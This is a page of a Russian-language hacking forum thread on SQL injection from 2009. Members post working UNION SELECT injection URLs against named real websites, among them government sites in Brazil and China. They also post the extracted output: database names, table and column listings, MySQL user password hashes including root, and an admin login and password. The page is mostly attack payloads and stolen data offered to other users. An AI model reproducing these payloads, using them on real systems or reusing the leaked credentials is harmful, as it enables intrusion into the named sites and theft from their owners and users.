ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 825 из 1242 « Первая < 325725775815 821 822 823 824 825 826 827 828 829 835875925 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #8241  
Старый 09.03.2009, 02:39
Parserian
Новичок
Регистрация: 19.01.2009
Сообщений: 15
Провел на форуме:
31493

Репутация: 13
По умолчанию
http://www.gateway.uz
пр5, тиц 20

Код:
http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, concat_ws(0x3A3A, user(),database(),version())
uzdg@localhost::uzdg::5.0.32-Dotdeb_1.dotdeb.1-log


Код:
http://www.gateway.uz/index.php?article=-1 UNION SELECT 1, group_concat( concat_ws( 0x3A3A, TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME ) SEPARATOR 0x3C62723E ) FROM information_schema.COLUMNS GROUP BY TABLE_SCHEMA, TABLE_NAME
доступ в information_schema, смотрите таблички наздоровье.
 
Ответить с цитированием

  #8242  
Старый 09.03.2009, 09:06
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию
http://www.barretos.sp.gov.br/link.php?xvar=visualizar_noticia.php&xid=2775+unio n+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28/*

version(): 5.0.32-Debian_7etch8-log
database(): prefeitura
user(): prefeitura@localhost

http://www.barretos.sp.gov.br/link.php?xvar=visualizar_noticia.php&xid=2775+unio n+select+1,concat(version(),0x3a,database(),0x3a,u ser()),3,4,concat(user,0x3a,password),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28+from+mysql.user/*

root:*F198BE3CAC3D18166686B06616A7AF91F12C216B
debian-sys-maint:*6CAC5B20416E98730147E916FA95DC269C642096
prefeitura:*BBC9CA993C596C217D96B21D23D4C158D99025 21
moodle:*AFF9BCF11C745F9D5B71243B22B436F452094DE2
 
Ответить с цитированием

  #8243  
Старый 09.03.2009, 12:53
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
Код:
http://www.f1ticket.info/pages.php?ID=-1+union+all+select+0,convert(concat_ws(version(),user(),database())+using+latin1),2,3,4,5,6,7--
юзер/версия/бд:

Код:
f1ticket@localhost4.1.11-Debian_4sarge2-logf1ticket
 
Ответить с цитированием

  #8244  
Старый 09.03.2009, 16:33
Evgesha23
Новичок
Регистрация: 03.06.2007
Сообщений: 19
Провел на форуме:
378831

Репутация: 6
По умолчанию
http://www.toris.ru

http://www.toris.ru/?d=helper&id=-1+union+select+null,concat_ws(ver sion(),us er(),data base()),3--

u24236@10.10.10.2215.0.67-logu24236
 
Ответить с цитированием

  #8245  
Старый 09.03.2009, 17:02
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию
Код:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18--
юзер/версия/бд:

Код:
atm@localhost5.0.24atmweb
все таблицы:
Код:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables--
колонки из таблици admin:

Код:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name='admin'--
но увы при попытке вывода из колонок получаю ошибку
возможно что то туплю, возможно прав не хватает

***добавлено***

вывод:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,concat_ws(0x3a,admin_id ,admin_name,admin_email,admin_pass,admin_level),5, 6,7,8,9,10,11,12,13,14,15,16,17,18+from+test.admin

это я протупил!
Спасибо R1dex!
-----------------------------------------------
The End!
Последний раз редактировалось -m0rgan-; 09.03.2009 в 17:11..
 
Ответить с цитированием

  #8246  
Старый 09.03.2009, 18:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://www.topcasinos.es/juego/bingo.php?id=33+and+1=0+union+select+1,version(),3,4/*
там их точно 4.

спасибо R1dex
Последний раз редактировалось faza02; 09.03.2009 в 18:54..
 
Ответить с цитированием

  #8247  
Старый 09.03.2009, 18:25
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию
www.pswdoptimists.org

Код:
http://www.pswdoptimists.org/news.php?ax=v&n=1&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--


Version: 5.0.67-community
User: pswdopti_admin@localhost
Database: pswdopti_cms
 
Ответить с цитированием

  #8248  
Старый 09.03.2009, 19:42
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию
Код:
http://www.supervolos.ru/index1.php?option=news&page=1&id=-1+union+select+concat_ ws(0x3a ,version(),database(),user()),2,3--
Database Version : 5.0.54
Database name : z262240_svolos
User name : z262240_igoruser@localhost

----------------------------------------------------+

Код:
http://www.taraplast.com.ua/articleview.php?id=-1+union+select+1,concat_ws(0x3a,ve rsion(),data base(),user()),3,4,5,6,7,8,9,10--
Database Version : 5.0.45-log
Database name : taraplas_main
User name : taraplas_user@localhost

какой-то один юзверь, скорее всего админ:

Код:
http://www.taraplast.com.ua/articleview.php?id=-1+union+select+1,concat_ws(0x3a,login,pass word),3,4,5,6,7,8,9,10+from+login+li mit+0,1--
Код:
mythical:mistake
Последний раз редактировалось f1ng3r; 09.03.2009 в 20:18.. Причина: add
 
Ответить с цитированием

  #8249  
Старый 09.03.2009, 20:26
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию
Код:
http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10,11,12,13+FROM+users+LIMIT+1,1/*
Version():4.0.17-standard
Database():ccst2006
User():root@localhost

Код:
http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,concat(uid,0x3a,username,0x3a,password),3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13+FROM+users+LIMIT+1,1/*
4:xuguoxin:5668744b4e9be33ea7f34f2534e41455

Код:
http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+FROM+mysql.user+LIMIT+1,1/*
root:67457e226a1a15bd
 
Ответить с цитированием

  #8250  
Старый 09.03.2009, 21:03
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию
http://www.burnopfieldcc.com/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21/*

Database Version: 4.1.22
Database name: burnopfieldcc_com_-_database
User name: burnopfield@localhost
 
Ответить с цитированием
Ответ
Страница 825 из 1242 « Первая < 325725775815 821 822 823 824 825 826 827 828 829 835875925 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ